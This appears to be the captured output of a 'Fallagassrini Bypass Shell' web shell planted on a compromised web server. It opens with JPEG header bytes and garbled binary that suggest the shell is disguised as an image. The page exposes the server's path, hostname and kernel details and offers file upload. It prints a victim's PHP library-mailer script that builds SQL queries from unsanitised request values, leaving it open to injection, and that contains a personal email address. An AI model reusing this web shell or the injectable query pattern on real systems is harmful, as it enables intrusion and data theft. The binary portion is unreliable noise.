JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/easwari/www/llm/

Linux 141.162.178.68.host.secureserver.net 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Upload File :
Current File : /home/easwari/www/llm/test2.php

<?php
$to = 'shanmugamkani1994@gmail.com';
$subject = 'CheckIn and CheckOut Details';
$eswari = 'Eswari Lendying Library';
$user_email = 'shanmugamkani1994@gmail.com';
$user_name="Rajiv";
$branch='Mylapore';
$barcode='||566576||431||||';
$book='Agniserakogal';
$in_date='2017-03-31';
$out_date='2017-04-01';
$Old_amount='250';
$branch=$_REQUEST['branch'];
$member_code=$_REQUEST['membercode'];
$member_id=getmember_id($_REQUEST['membercode']);
$member_name=getmember_name($_REQUEST['membercode']);
$mem_email=getmember_email($_REQUEST['membercode']); 
$old_due_amount=$_REQUEST['old_due_amount'];
$reading_charge=$_REQUEST['reading_charge'];
$late_charges=$_REQUEST['late_charges'];
$discount=$_REQUEST['discount'];
$due=$_REQUEST['due'];
$other_payment=$_REQUEST['other_payment'];
$total_payment=$_REQUEST['total_payment'];
$paid_amount=$_REQUEST['paid_amount'];
$new_due_amount=$_REQUEST['new_due_amount'];
// To send HTML mail, the Content-type header must be set
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
 
// Create email headers
$headers .= 'From: '.$user_email."\r\n".
    'Reply-To: '.$user_email."\r\n" .
    'X-Mailer: PHP/' . phpversion();
	
function getmember_id($member_code)
{
$ret=mysql_fetch_row(mysql_query("select id from members where member_code='".$member_code."'"));
return $ret[0];
}
function getmember_name($member_code)
{
$ret=mysql_fetch_row(mysql_query("select member_name from members where member_code='".$member_code."'"));
return $ret[0];
}
function getmember_email($member_code)
{
$ret=mysql_fetch_row(mysql_query("select emailid from members where member_code='".$member_code."'"));
return $ret[0];
}
$sql="select * from check_out_in_history where member_id='".$member_id."' and branch='".$branch."'";
$source=mysql_query($sql);
$step=mysql_fetch_array($source);
// Compose a simple HTML email message
$message = '<html><body>';
$message .= '<p style="color:#080;font-size:18px;">'.$eswari.'</p>';
$message .= '<h1 style="color:#f40;">Hi '.$user_name.'!</h1>';
$message .= '<table width="500" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC">';
$message .= '<tr>';
$message .= '<th>'.Branch.'</th>';
$message .= '<th>'.Barcode.'</th>';
$message .= '<th>'.Book.'</th>';
$message .= '<th>'.In.' '.Date.'</th>';
$message .= '<th>'.Out.' '.Date.'</th>';
$message .= '<th>'.Old.' '.Amount.'</th>';
$message .= '<th>'.Reading.' '.Charge.'</th>';
$message .= '<th>'.Late.' '.Charge.'</th>';
$message .= '<th>'.Discount.'</th>';
$message .= '<th>'.Due.'</th>';
$message .= '<th>'.Other.' '.Payment.'</th>';
$message .= '<th>'.Total.' '.Payment.'</th>';
$message .= '<th>'.Paid.' '.Amount.'</th>';
$message .= '<th>'.NewDue.' '.Amount.'</th>';
$message .= '</tr>';

$message .= '<tr>';
while($step=mysql_fetch_array($source)){

$branch=$step['.branch.'];$barcode='$step['.barcode.']';$book='$step['.book_id.']';$in_date='$step['.expected_check_in_date.']';$out_date='$step['.check_out_date.']';

$message .= '<td>'.$branch.'</td>';
$message .= '<td>'.$barcode.'</td>';
$message .= '<td>'.$book.'</td>';
$message .= '<td>'.$in_date.'</td>';
$message .= '<td>'.$out_date.'</td>';
$message .= '<td>'.$old_due_amount.'</td>';
$message .= '<td>'.$reading_charge.'</td>';
$message .= '<td>'.$late_charges.'</td>';
$message .= '<td>'.$discount.'</td>';
$message .= '<td>'.$due.'</td>';
$message .= '<td>'.$other_payment.'</td>';
$message .= '<td>'.$total_payment.'</td>';
$message .= '<td>'.$paid_amount.'</td>';
$message .= '<td>'.$new_due_amount.'</td>';
}
$message .= '</tr>';
$message .= '</table>';
$message .= '</body></html>';
 
// Sending email
if(mail($to, $subject, $message, $headers, $from)){
echo $to.",".$user_email;
    echo 'Your mail has been sent successfully.';
} else{
    echo 'Unable to send email. Please try again.';
}
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net